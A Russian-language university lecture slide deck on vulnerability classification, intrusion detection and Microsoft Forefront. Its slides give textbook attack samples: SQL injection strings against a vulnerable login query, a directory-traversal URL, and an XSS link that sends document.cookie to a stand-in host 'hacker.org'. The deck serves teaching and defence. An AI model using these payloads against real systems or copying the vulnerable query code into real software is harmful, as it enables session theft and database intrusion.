24
Технологии и продукты Microsoft в обеспечении ИБ Лекция 16. Анализ защищённости информационной системы на основе выявления уязвимостей и обнаружения вторжений

Технологии и продукты Microsoft в обеспечении ИБ

Embed Size (px)

DESCRIPTION

Лекция 16 . Анализ защищённости информационной системы на основе выявления уязвимостей и обнаружения вторжений. Технологии и продукты Microsoft в обеспечении ИБ. Цели. striDe. Изучить классификацию уязвимостей, информационных атак и их возможных последствий. - PowerPoint PPT Presentation

Citation preview

Page 1: Технологии и продукты Microsoft в обеспечении ИБ

Технологии и продукты Microsoft в обеспечении ИБ Лекция 16. Анализ защищённости информационной системы на

основе выявления уязвимостей и обнаружения вторжений

Page 2: Технологии и продукты Microsoft в обеспечении ИБ

2 Высшая школа экономики - 2008

Цели

Изучить классификацию уязвимостей, информационных атак и их возможных последствий.

Рассмотреть различные типы технологических и эксплуатационных уязвимостей программно-аппаратного обеспечения АС.

Изучить основные способы реализации информационных атак.

Научиться отличать сетевые и хостовые системы анализа защищённости.

Познакомиться с методами сбора и анализа информации, реализуемые в системах анализа защищённости.

Page 3: Технологии и продукты Microsoft в обеспечении ИБ

3 Высшая школа экономики - 2008

Уязвимость - «ахиллесова пята» информационных систем

Page 4: Технологии и продукты Microsoft в обеспечении ИБ

4 Высшая школа экономики - 2008

От чего защищать?

Page 5: Технологии и продукты Microsoft в обеспечении ИБ

5 Высшая школа экономики - 2008

Типы уязвимостей

Технологические уязвимости Уязвимость типа «переполнение буфера» Уязвимость типа «SQL Injection» Уязвимость типа «format string»

Эксплуатационные уязвимости Неправильная настройка сетевых сервисов АС Использование слабых и нестойких к угадыванию

паролей доступа Отсутствие установленных модулей обновления

программного обеспечения (Service Packs, HotFixes, и т.д.)

Page 6: Технологии и продукты Microsoft в обеспечении ИБ

6 Высшая школа экономики - 2008

Классификация уязвимостей АС

Уязвимости автоматизированных систем

Уязвимость аппаратногообеспечения

По типу обеспечения АС, в котором содержится уязвимость

Уязвимость общесистемного программного обеспечения

Уязвимость прикладного программного обеспечения

Уязвимостьтехнологического этапа

По этапу жизненного цикла АС, на котором внедряется уязвимость

Уязвимость эксплуатационного этапа

По типу уязвимости

Уязвимость в программно-аппаратном обеспечении АС

Уязвимость в организационно-правовом обеспечении АС

Уязвимости, внесённые преднамеренным путём

По степени преднамеренности внесённой уязвимости АС

Уязвимости, внесённые непреднамеренным путём

Уязвимость рабочих станций АС

По типу компонента АС, в котором содержатся уязвимость

Уязвимость серверов АС

Уязвимость коммуникационного оборудования и каналов связи АС

Уязвимость сетевого уровня

Уязвимость при-кладного уровня

Уязвимостьфизического уровня

Уязвимость канального уровня

По уровню модели сетевого взаимодействия, на котором присутствует уязвимость

Уязвимость транс-портного уровня

Page 7: Технологии и продукты Microsoft в обеспечении ИБ

7 Высшая школа экономики - 2008

Технологическая уязвимость типа«переполнение буфера»

Page 8: Технологии и продукты Microsoft в обеспечении ИБ

8 Высшая школа экономики - 2008

Источники уязвимостей типа «buffer overflow»

программы, которые запускаются локально на хосте

сетевые приложения, которые обеспечивают интерактивное взаимодействие с пользователем на основе сетевых протоколов. Примером сетевых программ являются Web-приложения, такие как CGI-модули, PHP-сценарии, активные серверные страницы ASP и др.

хранимые процедуры серверов СУБД

Page 9: Технологии и продукты Microsoft в обеспечении ИБ

9 Высшая школа экономики - 2008

Технологическая уязвимость «SQL Injection»

Уязвимости типа «SQL Injection» («инъекция в SQL-запросы») позволяют нарушителю выполнять несанкционированные операции над содержимым баз данных SQL-серверов путём вставки дополнительных команд в SQL-запросы

Уязвимость «SQL Injection» заключается в отсутствии проверки корректности данных, поступающих на вход программе, что потенциально может позволить нарушителю составить входные данные таким образом, что приведёт к искажению искомого SQL-запроса к СУБД

Page 10: Технологии и продукты Microsoft в обеспечении ИБ

10 Высшая школа экономики - 2008

Активизация уязвимости «SQL Injection» с целью получения НСД

SQLQuery = "SELECT Username FROM Users WHERE Username = '" &

strUsername & "' AND Password = '" & strPassword & "'"

strAuthCheck = GetQueryResult(SQLQuery)

If strAuthCheck = "" Then

boolAuthenticated = False

Else

boolAuthenticated = True

End If

«SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''»

(полужирным шрифтом выделены команды, которые внедряются нарушителем в исходный SQL-запрос).

Page 11: Технологии и продукты Microsoft в обеспечении ИБ

11 Высшая школа экономики - 2008

Активизация уязвимости «SQL Injection» с целью извлечения данных

SQLString = "SELECT FirstName, LastName FROM Employees WHERE City = '" & strCity & "'«

SELECT FirstName, LastName FROM Employees WHERE City =

'' UNION ALL SELECT OtherField FROM OtherTable WHERE ''=''

Page 12: Технологии и продукты Microsoft в обеспечении ИБ

12 Высшая школа экономики - 2008

Технологическая уязвимость «Directory traversal»

Уязвимости типа «Directory traversal» («просмотр директорий») могут позволить злоумышленнику получить несанкционированный доступ к файловым ресурсам сервера в обход установленных правил разграничения доступа

«http://192.168.0.1/getnews.asp?item= ../../../../WINNT/win.ini»

Page 13: Технологии и продукты Microsoft в обеспечении ИБ

13 Высшая школа экономики - 2008

Технологическая уязвимость «Cross Site Scripting»

Уязвимости типа «Cross Site Scripting» («межсайтовое выполнение сценариев») характерны для серверных Web-приложений, не предусматривающих проверку синтаксиса входных данных, на основе которых формируются HTML-документы, отправляемые пользователям

«<A HREF="http:// www.server.ru/ShowError.asp? error_text= <script>document.location. replace('http://hacker.org/steal.cgi?+document.cookie');</script>">Link Text </A>»

Page 14: Технологии и продукты Microsoft в обеспечении ИБ

14 Высшая школа экономики - 2008

Уязвимости реализаций стека TCP/IP

Уязвимости реализаций стека TCP/IP связаны с ошибками, которые допускаются программистами на этапе реализации программных модулей, отвечающих за обработку входящих и исходящих пакетов данных

Пример уязвимости данного типа – атака «Land»

хостхост

Page 15: Технологии и продукты Microsoft в обеспечении ИБ

15 Высшая школа экономики - 2008

Жизненный цикл атаки

Page 16: Технологии и продукты Microsoft в обеспечении ИБ

16 Высшая школа экономики - 2008

Типы информационных атак

Page 17: Технологии и продукты Microsoft в обеспечении ИБ

17 Высшая школа экономики - 2008

Инструментальный анализ защищенности

Для чего предназначен:• Инвентаризация ресурсов сети (устройства, ОС, службы, ПО)• Идентификация и анализ технологических уязвимостей• Подготовка отчетов, описание проблем и методов

устранения

Типы используемых для анализа средств:• Сетевые сканеры безопасности • Хостовые сканеры безопасности (проверка ОС и

приложений) • Утилиты удаленного администрирования • Утилиты для верификации найденных уязвимостей • Утилиты для инвентаризации ресурсов

Page 18: Технологии и продукты Microsoft в обеспечении ИБ

18 Высшая школа экономики - 2008

Сбор информации

Сетевые датчики предназначены для сбора информации о пакетах данных, передаваемых в том сегменте ИС, где установлен датчик

Хостовые датчики устанавливаются на определённые компьютеры в ИС и предназначаются для сбора информации о событиях, возникающих на этих компьютерах

Page 19: Технологии и продукты Microsoft в обеспечении ИБ

19 Высшая школа экономики - 2008

Анализ информации

Сигнатурные методы описывают каждую атаку в виде специальной модели или сигнатуры. В качестве сигнатуры атаки могут выступать: строка символов семантическое выражение на специальном языке формальная математическая модель и т.д.

Поведенческие методы отслеживают несоответствия между текущим режимом функционирования ИС и моделью штатного режима работы, заложенной в параметрах метода

Page 20: Технологии и продукты Microsoft в обеспечении ИБ

20 Высшая школа экономики - 2008

Защита периметраЗащита периметраЗащита серверных Защита серверных приложенийприложений

Защита клиентской Защита клиентской и серверной ОСи серверной ОС

Всесторонняя защита бизнес-приложений, позволяющая достичь лучшей защиты и безопасного доступа посредством глубокой интеграции и упрощенного управления

Microsoft Forefront

Page 21: Технологии и продукты Microsoft в обеспечении ИБ

21 Высшая школа экономики - 2008

Forefront Network Inspection System (NIS) Сигнатуры, основанные на уязвимостях Основана на GAPA от Microsoft Research

• Generic Application Level Protocol Analyzer

Платформа для быстрого низкоуровневого сканирования

Расширяема

Security assessment and response (SAS) Моделирование, основанное на поведении

Система предотвращения вторжений

Page 22: Технологии и продукты Microsoft в обеспечении ИБ

22 Высшая школа экономики - 2008

Основанная на сигнатурах Определяет и противостоит атакам из интернета,

основанным на уязвимостях Определяет и предупреждает о «внутренних»

компьютерах, которые ведут атаки Основанная на анализе поведения

«Найди то, не знаю что» Отслеживает поведение систем и определяет

потенциально зловредные компоненты сети Может противодействовать угрозе на основании

политики

Система предотвращения вторжений

Page 23: Технологии и продукты Microsoft в обеспечении ИБ

23 Высшая школа экономики - 2008

Использованные источники

Сердюк В.А. Уязвимость - «Ахиллесова пята» современных информационных систем «BYTE/Россия», 2004, №4 (68), стр. 19-22.

Сердюк В.А. Вы атакованы – защищайтесь (методология выявления атак) // «BYTE/Россия», 2003, №9 (61), стр. 61-64

Сердюк В.А. Новое в защите от взлома корпоративных систем. Техносфера; 2007.

Калихман Р. Forefront Client Security: технический обзор // Microsoft, слайды. Опубликовано: https://msdb.ru/Downloads/f/d5214ed0-b831-4e27-b85c-ad61a700ea45/1_FCS_overview.pdf

Page 24: Технологии и продукты Microsoft в обеспечении ИБ

Спасибо за внимание!